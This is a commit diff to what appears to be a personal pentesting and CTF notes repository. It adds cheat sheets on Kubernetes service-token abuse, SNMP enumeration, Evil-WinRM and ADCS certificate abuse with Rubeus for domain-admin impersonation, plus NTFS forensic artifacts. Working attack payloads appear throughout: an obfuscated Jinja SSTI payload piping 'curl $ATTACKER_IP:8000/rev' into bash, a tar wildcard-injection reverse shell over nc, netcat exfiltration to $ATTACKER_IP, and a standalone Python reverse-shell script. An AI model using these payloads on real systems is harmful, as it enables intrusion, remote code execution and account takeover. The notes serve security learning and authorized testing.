bump
This commit is contained in:
parent
210ae2791c
commit
d08a37a97d
|
@ -133,3 +133,6 @@
|
|||
[submodule "misc/static-binaries"]
|
||||
path = misc/static-binaries
|
||||
url = https://github.com/andrew-d/static-binaries.git
|
||||
[submodule "stego/stego-toolkit"]
|
||||
path = stego/stego-toolkit
|
||||
url = https://github.com/DominicBreuker/stego-toolkit.git
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
# Kubectl
|
||||
|
||||
```sh
|
||||
kubectl get pods
|
||||
```
|
||||
* Check mounted secret
|
||||
```sh
|
||||
kubectl auth can-i --list
|
||||
kubectl get secrets
|
||||
kubectl get nodes
|
||||
kubectl get deployments
|
||||
kubectl get services
|
||||
kubectl get ingress
|
||||
kubectl get jobs
|
||||
```
|
||||
* Intel about a secret, and output
|
||||
```sh
|
||||
kubectl describe secrets <secret>
|
||||
kubectl describe secrets <secret> -o 'json'
|
||||
```
|
||||
## Abuse Token
|
||||
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
|
||||
* By change of an LFI extract the token and
|
||||
```sh
|
||||
kubectl auth can-i --list --token=$TOKEN
|
||||
kubectl get pods --token=$TOKEN
|
||||
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
|
||||
```
|
||||
|
||||
## Create Pods
|
||||
|
||||
* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
|
||||
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
|
||||
```sh
|
||||
kubectl apply -f pod.yml --token=$TOKEN
|
||||
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
|
||||
```
|
|
@ -0,0 +1,11 @@
|
|||
# SNMP Enumeration
|
||||
|
||||
* Find community strings
|
||||
```sh
|
||||
onesixtyone $TARGET_IP -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
|
||||
```
|
||||
* Query users
|
||||
```
|
||||
snmpwalk -v2c -c <community_string> $TARGET_IP 1.3.6.1.4.1.77.1.2.25
|
||||
```
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
# Netcat
|
||||
|
||||
* RX
|
||||
```sh
|
||||
nc -lp 8080 > out.txt
|
||||
```
|
||||
* TX
|
||||
```sh
|
||||
nc $ATTACKER_IP 8080 < in.txt
|
||||
```
|
||||
* Have to be end manually after a while
|
|
@ -0,0 +1,6 @@
|
|||
# Evil-winrm
|
||||
|
||||
* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
|
||||
```sh
|
||||
download C:\Windows\Temp\<file>
|
||||
```
|
|
@ -57,3 +57,8 @@ template = "User input is {{ input }}"
|
|||
return render_template_string(template, input=input)
|
||||
```
|
||||
|
||||
## Bypass
|
||||
* Save reverse shell as `rev`
|
||||
```sh
|
||||
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl $ATTACKER_IP:8000/rev | bash")|attr("read")()}}
|
||||
```
|
||||
|
|
|
@ -5,6 +5,12 @@
|
|||
|
||||
* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
|
||||
|
||||
```sh
|
||||
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh
|
||||
echo "" > "--checkpoint-action=exec=sh shell.sh"
|
||||
echo "" > "--checkpoint=1"
|
||||
```
|
||||
or
|
||||
```sh
|
||||
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
|
||||
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
# NTFS
|
||||
|
||||
* Has the following advantages over FAT
|
||||
* Journaling
|
||||
* ACL
|
||||
* Volume Shadow Copy
|
||||
* Alternate Data Stream
|
||||
|
||||
## Master File Table
|
||||
* VBR references to `$MFT`
|
||||
* `$LOGFILE` stores transactions of the file system
|
||||
* `$UsnJrnl` changed files, and reason for change
|
||||
|
||||
## Caching
|
||||
|
||||
* File information is cached for frequent use in
|
||||
```sh
|
||||
C:\Windows\Prefetch\*.pf
|
||||
```
|
||||
* An SQLite database can be found under
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db
|
||||
```
|
||||
|
||||
## Jumplist
|
||||
|
||||
* Stores recently used files of applications inside the taskbar
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
|
||||
```
|
||||
|
||||
## Shortcut Files
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\
|
||||
C:\Users\<username>\AppData\Roaming\Microsoft\Office\Recent\
|
||||
```
|
||||
|
||||
## Internet Explorer History
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat
|
||||
```
|
||||
|
||||
## Removeable Device Setup Log
|
||||
```sh
|
||||
C:\Windows\inf\setupapi.dev.log
|
||||
```
|
||||
|
||||
|
|
@ -0,0 +1,50 @@
|
|||
## Active Directory Certificate Service ADCS
|
||||
|
||||
* Internal CA
|
||||
* PKI
|
||||
* File system encryption
|
||||
* Digital signatures
|
||||
* User authentication
|
||||
|
||||
* __Certificates will not be revoked after account password reset__
|
||||
|
||||
## Certificate Templates
|
||||
|
||||
* Extended/Enhanced Key Usage
|
||||
* Parameter combination can be exploited
|
||||
|
||||
### Enumeration
|
||||
|
||||
* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)
|
||||
|
||||
```sh
|
||||
certutil -v -template > ct.txt
|
||||
```
|
||||
|
||||
Exploitable templates should have the following traits:
|
||||
* `Allow Enroll` or `Allow Full Control` permissions to request certificate
|
||||
* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
|
||||
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
|
||||
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
|
||||
|
||||
### Certificate Creation
|
||||
|
||||
* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
|
||||
* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
|
||||
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
|
||||
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
|
||||
|
||||
### Impersonation
|
||||
|
||||
* Request TGT with the created cert
|
||||
* Grab TGT
|
||||
|
||||
* On the machine via
|
||||
```sh
|
||||
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain name> /dc:<IP of domain controller>
|
||||
```
|
||||
* Select a domain admin via opening `Active Directory Users and Computers`
|
||||
```sh
|
||||
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
|
||||
```
|
||||
* `runas /user:<domain>\<username of DA> cmd.exe`
|
|
@ -1,10 +1,21 @@
|
|||
# Pentesting
|
||||
* [Pentesting Execution Standard](http://www.pentest-standard.org/index.php/Main_Page)
|
||||
Authorized audit of security systems of computers and networks.
|
||||
* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?)
|
||||
* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) and [redteam.guide ROEs](https://redteam.guide/docs/templates/roe_template/)
|
||||
* Permissions
|
||||
* Scope
|
||||
* Engagement --> internal/external pentest or adversary emulation of APTs
|
||||
* Scope --> networks, IPs, exfilration of data, which stage, downtime, DDoS
|
||||
* Rules
|
||||
* NDA
|
||||
|
||||
## Campaign
|
||||
* [Checklist](https://redteam.guide/docs/checklists/red-team-checklist/)
|
||||
* [vectr.io](https://vectr.io)
|
||||
|
||||
* Engagement --> Concept of Operations (CONOPS), Resource and Personnel Requirements, Timelines
|
||||
* Operations --> Operators, Known Information, Responsibilities
|
||||
* Mission --> Exact commands to run and execution time of the engagement
|
||||
* Remediation --> Report, Remediation consultation
|
||||
|
||||
## Methodology
|
||||
|
||||
|
|
|
@ -0,0 +1,10 @@
|
|||
import os
|
||||
import socket
|
||||
import subprocess
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(("#Target", 3000))
|
||||
os.dup2(s.fileno(), 0)
|
||||
os.dup2(s.fileno(), 1)
|
||||
os.dup2(s.fileno(), 2)
|
||||
import pty;pty.spawn("/bin/bash")
|
|
@ -0,0 +1 @@
|
|||
Subproject commit 4e6c2daf5ce08dfdbb9f9711f92f686eee3a6348
|
Loading…
Reference in New Issue